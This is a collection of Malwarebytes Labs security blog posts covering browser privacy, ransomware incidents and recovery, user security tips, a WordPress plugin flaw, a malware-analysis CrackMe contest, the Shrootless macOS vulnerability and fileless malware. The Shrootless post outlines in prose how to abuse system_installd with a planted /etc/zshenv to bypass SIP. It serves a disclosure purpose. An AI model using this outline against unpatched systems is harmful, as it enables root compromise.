IT NEWS

Is Apple’s Safari browser the last, best hope for web privacy?

What browser do you use?

There’s a good chance—roughly one in seven—that it’s Google Chrome. And even if you prefer a different browser, there’s a good chance that you’re using something that’s based on Google Chrome, such as Edge, Vivaldi, Chromium, Brave, or Opera.

After a decade and and a half of relatively healthy competition between vendors, the World Wide Web is trending towards a browser monoculture. We’ve been there before and history suggests it’s bad news.

Last time it was Microsoft in the driver’s seat, and open standards and security were left tumbling about in the rear without a seat belt. This time Google has its hands on the wheel, and it’s our privacy in the back seat, being taken for a ride.

Chrome needs a counterweight and, thankfully, it still has one in Apple’s Safari browser. It’s imperfect, for sure, and its glacial pace of development might even be holding us all up, as Scott Gilbertson thoughtfully illustrated in a recent article on The Register. But it might also be the last, best hope for browser privacy we have.

Hear me out…

How Chrome ate the web

Google Chrome first appeared in 2008 and rapidly established itself as a browser that couldn’t be ignored, thanks to some catchy marketing on Google’s massive advertising platform. It was an excellent product with a ravenous appetite for market share, and its noisy focus on speed and security forced its rivals to take notice and compete on the same terms. Everyone benefitted.

And because none of the major browser vendors had enough market share to “embrace, extend and extinguish“, as Microsoft had attempted when Internet Explorer was dominant, everyone was forced to follow the same open standards. This meant that web applications mostly worked the same way, no matter what browser you used.

However, as Chrome’s popularity increased, Google was able to exert more and more influence on the web in service of its ad-based business model, to the detriment of users’ privacy.

For example, in 2016 Google introduced AMP, a set of web standards that were designed to make websites faster on mobile devices. In a move that could have come straight out of Redmond circa 1996, the AMP rulebook was written by Google and varied wildly from the open standards everyone had been working towards for the past fifteen years or so.

AMP was superficially open, but there was no AMP without Google. To use AMP your pages had to load code from Google-owned domains, debugging your code required Google-owned tools, your pages were stored in a Google-owned cache, and they were displayed under a Google-owned domain, so that users weren’t really on your website anymore, they were looking at your web pages on Google, thank you very much.

To incentivise the use of AMP, Google leveraged its search monopoly by creating “reserved” slots at the top of its mobile search rankings that were only available to AMP pages. If you wanted to top the search rankings, you had to play the AMP game.

Google pulled another bullish move in 2018 when it decided that logging into and out of a Google website like GMail or YouTube was the same as logging into the Chrome browser, because it could. So instead of being logged into the giant surveillance monster while you were using its websites, you were logged into the giant surveillance monster all the time, unless you remembered to log out of the browser, which of course you didn’t, because people just don’t think about logging in and out of their browser.

And then this year we had a great illustration of the bind that Google’s in even when it tries to do the right thing. It’s got the message that users want less tracking and more privacy, but unlike Firefox and Safari, Chrome can’t simply block the third-party cookies used for tracking, because Google’s advertising business model (and therefore Chrome’s very existence) depends on them.

Chrome is planning to ban third-party cookies, but not until at least 2023—years after Safari—because it needs to establish a replacement tracking tech.

The replacement is called Federated Learning of Cohorts (FLoC), and it’s designed to thread the needle of enabling targeted ads while keeping users anonymous, by lumping similar users into great big groups, called Cohorts. It may yet deliver ads that disrespect your privacy less, but it’s a brand new technology and it’s off to a slow, rocky start.

FLoC shows us why even a benign Google monoculture would hold back user privacy, and why Chrome needs a counterweight.

The other candidates

Edge

On the face of it, Microsoft seems a good potential counterweight to Google (stop sniggering at the back, a counterweight doesn’t need to be perfect, it just needs to have different weaknesses and be hard to kill).

Everyone who uses Windows gets its browser for free, and Microsoft has been happy to use privacy as a stick to beat its rival when it suits. For example, when it launched Internet Explorer 10, Microsoft enabled the nascent Do Not Track feature by default, a pro-privacy step that it knew Google couldn’t follow without cutting off its ad revenue. (Admittedly, it probably crashed the entire Do Not Track program in the process, but it was a terrible idea that was never going to work.)

Unfortunately, Microsoft handed in its big stick when it adopted Chrome as the basis for its own Edge browser, effectively removing one of the last pillars holding up the open standards-based web.

Mozilla Firefox

Mozilla Firefox is my favourite browser and I would love to be talking it up as a potential counterweight to Chrome. After all, it walks the walk in terms of pro-privacy features, and it has already ended one browser monopoly, in 2002, when it emerged to challenge Internet Explorer’s lazy grip on the web.

Unfortunately, as good as it is, Firefox is on shaky ground. It costs a fortune to keep Firefox in the browser game, and the vast majority of the money it needs comes from Google, which pays hundreds of millions of dollars a year for the privilege of being Firefox’s default search engine. The deal is up in 2023 and Firefox’s market share is dwindling.

Our counterweight can’t stand in Google’s way while also depending on its largesse.

The case for Safari

Apple’s Safari is very much the “also ran” in the pantheon of modern browsers. It has never been cutting edge, or coveted, it’s only ever been, well, there. It isn’t my favourite browser. It’s not even my second favourite browser.

Gilbertson’s Register article rightly points out that Safari is a laggard when it comes to new features, saying “Apple’s Safari lags considerably behind its peers in supporting web features … well behind the competition”. But how much does that matter, really? The web was mostly feature complete years ago, and modern web standards are often complex definitions of things that almost nobody needs.

It may be a bit “low energy”, but we don’t actually need Safari to be better than Chrome at web standards, or to become the best, or the most popular browser, it just needs to be good where Chrome is bad, too big to ignore, and unlikely to fail.

Well, Apple is good where Google is bad: It’s business model doesn’t rely on advertising, so it can be unabashedly pro-privacy. And it’s been pro-privacy long enough for us to judge it on its track record, which is actually pretty good, recent hiccups notwithstanding.

For example, where Chrome can’t afford to block third-party cookies for another year or more, Safari has been going one better since 2017, when it introduced Intelligent Tracking Protection, a clever box of tricks that blocks other forms of cross-site tracking. And there’s plenty more besides.

And, yes, Safari is currently too big to ignore, and even getting a bit bigger. In fact it’s the only major browser that’s gained market share since the arrival of Chrome.

Statcounter puts Safari’s share of the desktop browser market at a steady 9.5 percent, and its share of the mobile browser market at about 25. Even its modest share of the desktop market is too large to be ignored by anyone serious about building a web app, but it’s the iPhone that’s most likely to be a thorn in the side of anyone thinking of ignoring Apple’s browser.

According to Statista, the iPhone had a 14 percent global market share in the second quarter of 2021, but its data also shows that the iPhone’s global market share jumps to 20 percent in the last quarter of each and every year, presumably because of Christmas sales. This speaks to the platform’s continued desirability, which has always been Apple’s bulwark against cheaper and more capable competitors.

iPhone users also spend more money than Android users, and in rich countries like the USA, where you’ll find enormous software markets and lots of startups, the iPhone has a whopping 50 percent of the market or more.

The people who build the websites you use like Apple, and whether you like it or not, that matters.

When it comes to protecting privacy on the web, the most important thing might be the phones in the pockets of the web developers and the CEO.

The post Is Apple’s Safari browser the last, best hope for web privacy? appeared first on Malwarebytes Labs.

A week in security (Oct 25 – Oct 31)

Last week on Malwarebytes Labs

Other cybersecurity news

Stay safe, everyone!

The post A week in security (Oct 25 – Oct 31) appeared first on Malwarebytes Labs.

Celebrity jewelry house Graff falls victim to ransomware

Data on countless celebrities, including politicians, is apparently now in the hands of ransomware attackers after a group using the Conti variant compromised systems of one of the world’s most exclusive jewelry houses, Graff.

Despite what mathematicians like to think, there is an exception to every rule. When we wrote in our Demographics of Cybercrime Report that money (or its absence) changes our sense of safety, that wasn’t meant to imply that the rich feel like they’re bigger targets. Quite the opposite, those that don’t have money were found to feel less safe online. But the fact that the rich are, in fact, more attractive targets is of course true.

High-end targets

The personal information of celebrities like Oprah Winfrey, David and Victoria Beckham, Tom Hanks, and Melania and Donald Trump were stolen during a ransomware attack on Graff.  The Conti Ransomware gang have claimed responsibility.

Conti news site
The Conti News site claims to have published 1% of the stolen data

Conti is one of the gangs that, besides encrypting files, exfiltrate data from the compromised systems. When the victim refuses to pay the ransom, the gang publishes the exfiltrated data, or sells them to the highest bidder. Conti recently announced that they will also publish data as soon as details or screenshots of the ransom negotiations process are leaked to journalists.

The Conti gang also recently made the news recently when they put the access to compromised networks up for sale, as well as when some underpaid turncoat leaked their manuals, technical guides, and software on an underground forum.

According to Graff, the vast majority of clients have not been the victim of personal data loss and those that were affected have been informed by mail.

The target

From the all-caps official statement on its site, Graff is shaken but not stirred.

“PLEASE BE ASSURED THAT WE REACTED SWIFTLY TO SHUT DOWN OUR NETWORK AND DIRECTLY INFORMED THOSE INDIVIDUALS WHOSE PERSONAL DATA WAS AFFECTED, ADVISING THEM ON APPROPRIATE STEPS TO TAKE. WE ALSO NOTIFIED THE INFORMATION COMMISSIONER’S OFFICE AND CONTINUE TO WORK WITH LAW ENFORCEMENT AGENCIES. FORTUNATELY, THANKS TO OUR ROBUST BACK-UP FACILITIES, NO DATA WAS IRREVOCABLY LOST. WE WERE ABLE TO REBUILD AND RESTART OUR SYSTEMS WITHIN DAYS TO CONTINUE TO OPERATE EFFECTIVELY AND ALL OUR SHOPS AND ECOMMERCE PLATFORM WERE UNAFFECTED AND CONTINUED TO OPERATE WITHOUT INTERRUPTION.“

The investigation

A spokesman for the UK’s Information Commissioner’s Office (ICO), which can impose fines of up to 4% of a company’s turnover for failing to comply with the Data Protection Act, said:

“We have received a report from Graff Diamonds Ltd regarding a ransomware attack. We will be contacting the organization to make further enquiries in relation to the information that has been provided.”

Unfortunately, knowing who did it and knowing who to arrest, and how, are two very different things when it comes to cybercrime. Sometimes attribution is hard, but even in cases where law enforcement knows who is behind the attack, it doesn’t make it easy to apprehend the evil-doers.

In this case, the group that was behind the attack made a public confession and published proof, but we don’t know the real names of the people in this group. We have good reason to assume that they are in Russia, but even of that we can’t be sure.

It is only in rare cases that cybercriminals travel to countries where they run the risk of being extradited to the US or another country where there is a warrant out for them.

What’s next?

In the case of high-end jeweler Graff, it doesn’t sound as if they have plans to pay the ransom, so it is highly likely that more of the exfiltrated data will be published on the Conti leak site.

The data that were stolen do not seem to be of an alarmingly private nature. Conti has been known to attack targets in the public health sector where far more delicate information is to be found. But maybe with this attack it has angered some people that have the power to make things happen.

Want to know more about Conti?

The post Celebrity jewelry house Graff falls victim to ransomware appeared first on Malwarebytes Labs.

Lessons from a real-life ransomware attack

Ransomware attacks, despite dramatically increasing in frequency this summer, remain opaque for many potential victims. It isn’t anyone’s fault, necessarily, since news articles about ransomware attacks often focus on the attack, the suspected threat actors, the ransomware type, and, well, not much else. Sadly, there’s rarely discussion about the lengthy recovery, which, according to the Ransomware Task Force, can last an average of 287 days, or about the complicated matter that the biggest, claimed defense to ransomware attacks—backups—often fail.

There also isn’t enough coverage about the human impact from ransomware. These cyberattacks do not just hit machines—they hit businesses, organizations, and the people who help those places run.

To better understand the nuts and bolts of a ransomware attack, we spoke to Ski Kacaroski, a systems administrator who, in 2019, helped pulled his school district out of a ransomware nightmare that encrypted crucial data, locked up vital systems, and even threatened employee pay. Kacaroski spoke at length on our Lock and Code podcast, which can be heard in full below, offering several insights for those who may not know the severity of a ransomware attack.

Here are some of the most surprising and insightful lessons that he shared with us.

The first few hours are critical

At 11:37 pm on the night of September 20, 2019, cybercriminals launched a ransomware attack against the Northshore School District, which is north of Seattle in Washington State. The cybercriminals deployed the Ryuk ransomware against the school district, which relied on a datacenter of 300 Windows and Linux black box servers. The district also managed 4,000 staff members’ devices, including Windows, Mac, and Chromebook workstations, along with many iPad tablets.

The morning after the attack, Kacaroski got a phone call from one of the school district’s database administrators about problems with the database server. Shortly after logging into his employer’s VPN and poking around, Kacaroski learned that the server had been hit with ransomware. He saw one, unencrypted file—a ransomware note from the threat actors—and countless .ryuk file extensions nearly everywhere else.

These first few hours after the attack, Kacaroski said, are when he made a crucial mistake.

“If I was to redo this again, the minute I saw the first one [hit], I would’ve just pulled the power on every single box, ASAP,” Kacaroski said. “I definitely cost us probably a few boxes by not doing that quickly enough. But you never think you’re going to be hit by ransomware, so that’s not usually the first thing you consider when somebody reports the system is not working right.”

Kacaroski said that his school district’s cyber insurance provider later told his team that ransomware operators often target only Windows machines in these attacks. That kind of knowledge could have helped Kacaroski prioritize his and his colleague’s immediate reactions, protecting the Windows machines without worrying about any real threats to the Linux and Mac machines.

Your backups may not work 

In the immediate aftermath of the attack, Kacaroski said he and his colleague, another sysadmin who works on Windows, were dealing with “an incredible amount of uncertainty.” They did not know what critical services had been hit, they were still trying to figure out which drives were operational by pinging them, and they were still working under the assumption that all of their devices—not just Windows machines—could be threatened.

But at least initially, Kacaroski said he and his colleague were feeling somewhat confident. After all, Kacaroski said, his school district had implemented proper backups. Or so he thought.

“We have a very good backup system, or at least what we thought was an extremely solid, rock-solid backup system,” Kacaroski said. “And then we find out, at about 4 or 5 hours after the attack, that our backup system is completely gone.”

Kacaroski’s situation is, believe it or not, somewhat common. Earlier this year, despite having a backup system in place, the meat supplier JBS still decided to pay $11 million to its attackers to obtain a decryption key after getting hit with ransomware. The biggest mistake that organizations make in setting up their backups, as we discussed in a separate episode of Lock and Code, is that those backups are not properly and regularly tested.

This moment of realization, Kacaroski said, hit him and his colleague hard.

“It started to really sink in that I’m going to have to rebuild 180 Windows servers, and more importantly, rebuild Active Directory from scratch, with all those accounts and groups, and everything in it,” Kacaroski said. “That part really, really hurt us.”

A ransomware attack can be a months-long process

The attack against Northshore School District was not an overnight decision by a single group of hackers. In fact, it wasn’t even the work of one group of hackers.

According to Kacaroski, after both the FBI and the Department of Homeland Security helped investigate the attack on Northshore, employees learned about a months-long process that most likely led to the eventual ransomware infection. The initial breach into Northshore’s servers likely began in March 2019, six months before the final attack, and it involved a group of hackers simply installing Emotet to gain access to Northshore’s servers. Once access had been gained, that first group of hackers then sold its access off to another group of hackers who, according to Kacaroski’s learnings from the FBI, then installed TrickBot to obtain domain credentials. Once those credentials were swiped, the group that deployed TrickBot sold that information to yet another group of hackers, which were believed to be the same group that pushed the Ryuk ransomware onto the school district’s machines.

Interestingly, Kacaroski said that the school district was told that the attack was likely uncoordinated between the three different groups, with the groups acting independently and simply leveraging the prior group’s access.

What also surprised Kacaroski is that the Ryuk ransomware gangs operate like a franchise.

“What we’ve been told is the Ryuk group is a franchise like McDonalds,” Kacaroski said. “There’s the Ryuk group that runs the West Coast, the one that does the East Coast, the one that does something in between, and they don’t actually pay for access to the Ryuk stuff unless they have a successful attack, so they basically pay a fee back to the people that wrote it every time that they have a successful attack.”

There are more ransomware attacks than you’ve heard about—far more

The week after Northshore School District was hit with ransomware, its cyber insurance providers said four additional payments were made to other ransomware victims. That’s just one week in late 2019. With the number of attacks being reported on today, and the recorded, increased frequency of known attacks, we can safely assume that the number of undisclosed ransomware attacks has simply skyrocketed.

In immediate recovery, first prioritize and then look for “surprise” systems

In responding to the crisis of a ransomware attack, organizations need to prioritize what systems need to go back online first. Often, that work is made “easy” for an organization because ransomware will often hit just days—or hours—before crucial deadlines.

For Northshore School District, their ransomware attack happened just days before employees were scheduled to be paid. That’s a deadline that simply can’t be missed, Kacaroski said.

“Payroll has to run—it is a legal thing. You can not not pay people. You have to pay them, which means four days after the attack, we had to have payroll up and running,” Kacaroski said. “That was the most critical thing.”

The school district then prioritized getting Active Directory and the student record system back online, as those systems were used countless times each day to simply help the school run. The student record system, Kacaroski said, was used by teachers, parents, and students themselves, and it needed to go back online quick.

Finally, Kacaroski warned about what he called “surprise” systems—systems that are in place that an organization may not know about or may not understand are crucial until they’re gone. For Northshore School District, that system was for the school’s cafeteria and payment records.

“We had no clue that [the food services system] did 10,000 meals a day and 30,000 dollars… a day. We had no clue if the students had paid for their meals or haven’t paid or they owed us money,” Kacaroski said. “That one took a long time to get up and working because it was a distributed system and it had no backups at all.”

Avoid chokepoints during a long, collaborative recovery

The Northshore School District sysadmins are a small team of two, and in responding to the ransomware attack, there was only so much they could do—literally. Employees need to go home to sleep, and they need time to eat—as simple and basic as that sounds. Further, when recovering from a ransomware attack, there will almost always be what Kacaroski called a “system admin chokepoint.”

Because system administrators know how the systems themselves work, they can often become the single points of contact for rebuilding the entire business, piece by piece. Those system administrators can then get overburdened by too many teams coming to them repeatedly for information, sign-offs, and verifications.

To help move the recovery process forward, Kacaroski said organizations should find ways to free up their sysadmins, either by finding ways to rebuild systems independently, or by adding more sysadmins temporarily.

For Northshore School District, both methods were used.

After the attack, Kacaroski said his school district called up a local hosting firm that had done good work on small jobs that the school district itself couldn’t—or didn’t have the time to—do. Right after getting off the phone, that firm sent three additional sysadmins to help clean up the problem, Kacaroski said.

“We called them up. They gave us… essentially full-time, experienced sysadmins,” Kacaroski said. “We went from two to five. A huge increase.”

Kacaroski said that the beefed-up sysadmin team also gained some valuable breathing room when the school district found a paper-based workaround for its food services system. The school pared down its offerings and began providing only three options for school lunches for children. Each day during this temporary fix, the school could easily mark down, on paper, how many lunch options of each type were purchased by the students, still keeping accurate records while giving the school extra time to rebuild any digital services. Further, the school district decided to move its student record system, which was comprised of 27 Windows servers, to a SaaS solution, Kacaroski said.

“We had a vendor that we had a good relationship with, they dropped everything, and what is normally a six-month migration, they did in six days,” Kacaroski said. “But the most critical part is it didn’t have to go through the system admin chokepoint. That was a whole different group and they could just work on it on their own.”

All along the way, Kacaroski stressed the importance of strong relationships. Aided by local vendors, other school districts, parents, and other teams inside the school district itself, Northshore was able to recover about 80 – 85 percent of its systems and files in just two months, Kacaroski said.

““Like I say,” Kacaroski said, “relationships were the most critical thing.”


Listen to our full conversation on Lock and Code below

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

The post Lessons from a real-life ransomware attack appeared first on Malwarebytes Labs.

Tips to protect your data, security, and privacy from a hands-on expert

This post was authored by one of the most active helpers on the Malwarebytes forums who wishes to remain anonymous.

Back in the early days of personal computing, perhaps one of the only real concerns was data loss from a drive failure. That risk still exists, but we all face many other threats today too.

There are rootkits, Trojans, worms, viruses, ransomware, phishing, identity theft, and social engineering to worry about. And that’s not a comprehensive list.

So how can you avoid becoming victim?

Security tips

Practice good security measures such as slowing down and thinking before clicking on things. Use a strong and unique password for all accounts and sites. A long passphrase that cannot be found in a dictionary is one recommendation for a strong password; the use of a Password Manager is highly recommended. When possible, you should use multi-factor authentication (MFA) to help protect your accounts. Keep your operating system and installed software up to date. Check with both your Operating System vendor, Device vendor, and Software vendor frequently for security updates.

Pay close attention to the license agreements and installation screens when installing anything. If an installation screen offers you Custom or Advanced installation options, it is a good idea to select these as they will typically disclose what other third party software will also be installed. Take great care in every stage of the process and every offer screen, and make sure you know what it is you’re agreeing to before you click “Next.”

Avoid using Peer-to-Peer (P2P) file-sharing programs if possible. Likewise, avoid keygens, cracks, and other pirated software that can often compromise your data, privacy, or both.

Today, content blockers have become essential to help reduce ads, Trojans, phishing, and other undesirable content that an antivirus product alone may not cover. In addition, disabling browser push technology is recommended as it has become a source of abuse. Hover your mouse over website links and review where they actually go when possible, don’t just click on them. Consider using DuckDuckGo or StartPage as a home page and search provider in your browser to help improve your security and privacy.

Whether it’s your email, phone, messenger, or other applications, always be alert and on guard for someone trying to trick you into clicking on links or replying to a message. If someone is not on your address or contacts list, all the more reason to be suspicious. Never open attachments that come in unexpectedly in email, no matter how enticing. Even if from friends or family, always be cautious. If possible, save the attachment first, and have a site such as VirusTotal scan and confirm the attachment is not a threat before opening it.

Make sure you’re backing up your data frequently and validate that the data can be restored. It is highly recommended that you backup to an external device such as a USB drive for all of your essential data, and do not keep the backup drive connected to the system all the time. It should only be connected to do the backup, and then once the backup has been completed, disconnected. That’s because if your computer were to become infected and the backup drive was connected, the infection could potentially infect, delete, or encrypt your backup, rendering it useless. Never connect the backup drive to the computer if you suspect that you might potentially have an infection until you clean the computer or device.

Support forums such as Malwarebytes Forums and a few others have members or staff that are highly trained and can assist you further if you have specific questions or issues about your devices or security, or would like more details on any particular information shared in this article.

URL links with further information or access to the programs mentioned:

Malwarebytes Support Forum
https://forums.malwarebytes.com

Tips to help protect from infection
https://forums.malwarebytes.com/topic/258363-tips-to-help-protect-from-infection/

Privacy – protecting your digital footprint
https://www.sans.org/newsletters/ouch/ouch-april-2021/

Do I need a Windows Registry Cleaner?
https://forums.malwarebytes.com/topic/126481-do-i-need-a-windows-registry-cleaner/

Backup your data
https://forums.malwarebytes.com/topic/136226-backup-software/

Content blockers

Malwarebytes Browser Guard
https://www.malwarebytes.com/browserguard/

uBlock Origin

NoScript Security Suite
https://addons.mozilla.org/en-US/firefox/addon/noscript/

Web Browser recommendations
https://www.privacytools.io/browsers/

Delete cookies automatically | Cookie AutoDelete plugin

https://github.com/Cookie-AutoDelete/Cookie-AutoDelete
https://chrome.google.com/webstore/detail/cookie-autodelete/fhcgjolkccmbidfldomjliifgaodjagh
https://addons.mozilla.org/en-US/firefox/addon/cookie-autodelete/

Browser push notifications: a feature asking to be abused
https://blog.malwarebytes.com/security-world/technology/2019/01/browser-push-notifications-feature-asking-abused/

The post Tips to protect your data, security, and privacy from a hands-on expert appeared first on Malwarebytes Labs.

Update your OptinMonster WordPress plugin immediately

WordPress, the incredibly popular content management platform, is currently dealing with a nasty plugin bug which allows redirects.

What is a WordPress plugin?

Like most blogging platforms, WordPress allows you to change up its default functionality. This is done by adding bits of kit called plugins. Some will be from WordPress itself, others are created and maintained by third parties. Any plugin can be potentially unsafe, or coded poorly, or compromised in some way. It’s also entirely possible for rogues to make their own innocent looking plugin and cause chaos.

Plugins are often in the news for these kinds of problems. Just this month, we covered a WordPress plugin susceptible to multiple vulnerabilities. Last month, it was a plugin leaving shoppers vulnerable to cross site scripting bugs and a form of JavaScript injection. There are so many plugins that it’s a surefire bet another plugin will be the latest compromise before long. And even when it’s not possible to be 100% sure a plugin was involved in an attack, you can end up with a bad situation very quickly. Shall we see what’s happened this time?

Bug causes problems for up to 1 million sites

Yes, an astonishing 1 million WordPress sites have been affected this time around. A plugin called OptinMonster is a tool designed to make your site “sticky”. That is, keep people around for longer, convert interest to sales, sign up to newsletters, build up elements of your site, and more.

This plugin relies on API endpoints to do its job. An API is an Application Programming Interface, and you can read a fantastic plain-English description of what an API is and does here.

Sadly, it seems some of the endpoints weren’t secure, and attackers with API keys designed for use with the OptinMonster service could get up to no good. Changes could be made to accounts, or malicious code could be placed on the site without a visitor’s knowledge.

CVE-2021-39341

The bug, known as CVE-2021-39341 and discovered at the end of September, has been addressed by the OptinMonster developers. Stolen API keys have been invalidated, and a patch was released on the October 7. It’s possible more updates may appear over the next few weeks.

What should I do if I have OptinMonster on my website?

If your API key has been revoked, you’ll have to create a new one. You should also ensure your plugin is kept up to date. In fact, you should be doing this for all of your plugins. It may be worth checking if they’re still maintained, and browsing the latest reviews to see if people are suddenly complaining about peculiar activity.

If you have plugins installed which you don’t use at all, or only very rarely, it may be worth having a spring clean. Often we rush to install dozens of plugins on a new website, and before we know it, we’ve forgotten what half of them are. There they sit, for months or years, just waiting for a juicy vulnerability to come along. Why take the risk?

There’s a number of ways you can keep your WordPress site safe from harm where plugins are concerned. Our advice is to devote some time to digging through the weeds and see what exactly you have lurking in the undergrowth.

The post Update your OptinMonster WordPress plugin immediately appeared first on Malwarebytes Labs.

The return of the Malwarebytes CrackMe

This blog post was authored by Hasherezade

Twice in the past (2017, 2018) we published a Capture-The-Flag challenge dedicated to aspiring malware analysts. Each time it was a Windows executable, containing up to 3 stages to break, in order to get the final flag. The goal of the crackme was to provide an exercise where the contestants will be able to challenge themselves in understanding and overcoming techniques commonly present in real-life malware. Yet we present them on a harmless example.

After a long break, we decided to resume our small contest, and possibly make it an annual event. Without further overdue, we present you the Malwarebytes CrackMe number 3!

Rules of the contest

The rules remain mostly unchanged since the second edition. As before we have two parallel tracks of the contest:

  1. The fastest solve. The three earliest submitted flags win. The flag should be submitted along with (minimalist) notes about the steps taken to find it. (No detailed write-up is required.) Any updates about the known winners in this category will be appended to this post.
  2. The best write-up. The write-up will be judged by its educational value, clarity, and accuracy. The author should show their method of solving the CrackMe, as well as provide the explanation of the techniques used in the challenge. The write-up submissions closes two weeks after the start of the challenge.

In each track we will select three winners that will be rewarded with unique Malwarebytes swag. The first place winner in each category will additionally get any IT-related book of their choice. All the solvers are going to be listed in our hall of fame.

The flag is in format: flag{...}

Submissions to both contests should be sent as a private message to the Twitter account: @hasherezade.

Three weeks after the challenge started we will publish the closing summary, along with the detailed walk-through, provided by the author.

WARNING: We are sorry, but Malwarebytes employees and people who had the access to the CrackMe before the official publication are not allowed to participate.

The application

The application is a Windows executable. It was tested on Windows 8 and above.

WARNING: please mind the fact that since the CrackMe contains techniques similar to those used in malware, it may be flagged by various AV products. It is a known false-positive. We recommend to run it on a VM, with Windows Defender disabled.

You can download it here.

MB crackme3

Best of luck, and have fun!

Hall of fame

We already have the first winner in the category “the fastest solve”:

  1. 🥇 @nazywam

Who will be next?

The post The return of the Malwarebytes CrackMe appeared first on Malwarebytes Labs.

Shrootless: Microsoft finds Apple macOS vulnerability

Microsoft researchers have discovered a vulnerability in macOS, dubbed Shrootless, that can allow attackers to bypass System Integrity Protection (SIP) and perform malicious activities, such as gaining root privileges and installing rootkits on vulnerable devices.

Microsoft reported the Shrootless attack to Apple’s security team earlier this year, together with a proof-of-concept that showed how the bug could be abused to install a malicious kernel extension (rootkit).

What is SIP?

SIP which is also known as “rootless” is designed to lock down the system from root by leveraging the Apple sandbox to protect the entire platform. Being able to bypass SIP basically gives the attacker full control of the system, because they can run arbitrary code without the protection kicking in.

Step by step, Apple has hardened SIP over the years against attacks by improving and finetuning the restrictions. One of the most effective SIP restrictions is the filesystem restriction. Without these restrictions, an attacker would be able to access and drop files in an area of the file system that is not intended for application files. The amount of damage an attacker can do to a device’s critical components is directly based on their ability to write unrestricted data to disk.

Since the filesystem restrictions are so powerful, Apple had to implement some exceptions. One of those exceptions is the daemon system_installd, which has the powerful com.apple.rootless.install.inheritable entitlement. With this entitlement, any child process of system_installd would be able to bypass SIP filesystem restrictions altogether.

The vulnerability

The Shrootless vulnerability could be used by an attacker to modify protected parts of the file system by abusing inherited permissions. Microsoft shared its findings with Apple through Coordinated Vulnerability Disclosure (CVD). The vulnerability exists in the macOS Big Sur and Monterey operating systems and was patched by Apple on October 25, 2021.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Shrootless is listed under  CVE-2021-30892.

The researchers found that during the installation process of a new application, an attacker could hijack the installation process by creating a specially crafted post-installation script and placing it in the location where the installation process looks for the post-installation script.

The gritty details

The method to use this vulnerability is pretty straightforward.

  • Download an Apple-signed package (using wget) that is known to have a post-install script. When installing an Apple-signed package (.pkg file), the said package invokes system_installd, which then takes charge of installing the former.
  • Plant a malicious /etc/zshenv that would check for its parent process. If it’s system_installd, then it would be able to write to restricted locations. If the package that is being installed contains any post-install scripts, system_installd runs them by invoking a default shell, which is zsh on macOS. Interestingly, when zsh starts, it looks for the file /etc/zshenv, and runs commands from that file automatically, if it exists.
  • Invoke the installer utility to install the package. This will invoke system_installd and because we used a package with a post-install script, zsh is invoked and executes the commands in the file we planted.

This way the Shrootless attack bypasses the SIP and effectively gives the attacker root access. As you will understand from this description the attacker will need some access to the system to begin with or they will not be able to plant the necessary /etc/zshenv.

Mitigation

The easiest and best way to avoid falling victim to this vulnerability is to update to macOS Big Sur 11.6.1 or better.

Stay safe, everyone!

The post Shrootless: Microsoft finds Apple macOS vulnerability appeared first on Malwarebytes Labs.

What is fileless malware?

Unlike traditional malware, which relies on a file being written to a disk, fileless malware is intended to be memory resident only, ideally leaving no trace after its execution. The malicious payload exists in the computer’s memory, which means nothing is ever written directly to the hard drive.

For an attacker, fileless malware has two major advantages:

  • There is no file for traditional anti-virus software to detect.
  • There is nothing on the hard drive for forensics to discover.

As a rule, if malware authors can’t avoid detection by security vendors, they at least want to delay it for as long as possible. Which makes fileless malware a step forward in the arms race between malware and security products.

Is fileless malware new?

Fileless malware attacks have been around for 20 years at least. The first malware to be classified as fileless was the Code Red Worm, which ran rampant in 2001, attacking computers running Microsoft’s Internet Information Services (IIS).

But in the last few years fileless attacks have become more prevalent. Four years ago, the Ponemon Institute’s “The State of Endpoint Security Risk Report,” reported that 77 percent of compromised attacks in 2017 were fileless, and that fileless attacks were ten times more likely to succeed. We noted the trend ourselves, with an overview of fileless attacks in 2018.

How is fileless malware delivered?

In the case of the Code Red Worm, the malware exploited a buffer overflow vulnerability that allowed it to write itself directly into memory. Modern ransomware attacks sometimes rely on PowerShell commands that execute code stored on public websites like Pastebin or GitHub.

Fileless malware attacks have also been seen hiding their code inside existing benign files or invisible registry keys. Some use the so-called CactusTorch framework in a malicious document. And sometimes the malicious code does exist on a hard disk, just not on the one that belongs to the affected computer. For example, “USB thief” resides on infected USB devices installed as a plugin in popular portable software. It gathers information on the targeted system and writes that to the USB device.

How to create fileless malware

Our esteemed colleague Vasilios Hioureas has written a walk-through by demonstrating some of his own fileless malware attacks. His write-up also nicely demonstrates what modern anti-malware solutions need to do to protect their users against fileless malware attacks. Showing that modern-day solutions must contain technology to dynamically detect malicious activity on the system rather than simply detecting malicious files. Old-school signature-based detection is useless when dealing with fileless malware.

What can fileless malware do?

In essence, fileless malware can do anything that “regular” malware can do, but for practical reasons you will often see that there is a limited amount of malicious, fileless code. For more complex programs like ransomware, the fileless malware might act as a dropper, which means the first stage downloads and executes the bigger program which is the actual payload. And, of course, fileless malware can use native, legitimate tools built into a system during a cyberattack.

The most common use cases for fileless malware are:

  • Initial access. The first step of a cyberattack is to gain a foothold on a system. This can be stealing credentials or exploiting a vulnerability in an access point.
  • Harvest credentials. Fileless malware is sometimes used to hunting for credentials, so an attacker can use alternative entry points or elevate their privileges,
  • Persistence. To ensure they have permanent access to a compromised system, an attacker might use fileless malware to create a backdoor.
  • Data exfiltration. An attacker might use fileless malware to hunt for useful information, such as a victim’s network configuration.
  • Dropper and/or payload. A dropper downloads and starts other malware (the payload) on a compromised system. The payload may come as a file, or it can be read from a remote server and loaded into memory directly.

Fileless malware detection

So, how can we find these fileless critters? Behavioral analysis and centralized management are key techniques for detecting and stopping fileless malware attacks. Knowing how to identify attacks and having an overview of the attack surface however is easier said than done.

What you need is anti-malware software that uses behavioral analysis, ideally supported by an Artificial Intelligence (AI) component. And for a large attack surface you will need something like a Security Information Event Management (SIEM) system to tie all the alerts and detections together.

In short, detecting malware is no longer a matter of detecting malicious files, but more and more a matter of detecting malicious behavior.

Stay safe, everyone!

The post What is fileless malware? appeared first on Malwarebytes Labs.

Threat profile: Ranzy Locker ransomware

